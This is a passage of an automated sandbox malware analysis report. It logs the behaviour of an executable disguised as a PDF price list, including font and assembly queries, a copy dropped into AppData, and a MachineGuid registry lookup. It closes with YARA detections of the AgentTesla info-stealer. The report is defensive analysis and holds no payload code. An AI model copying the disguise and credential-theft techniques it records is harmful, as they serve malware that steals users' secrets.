                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 8.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.445b260.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.445b260.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.4420640.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.1892988092.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1705533859.0000000004399000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
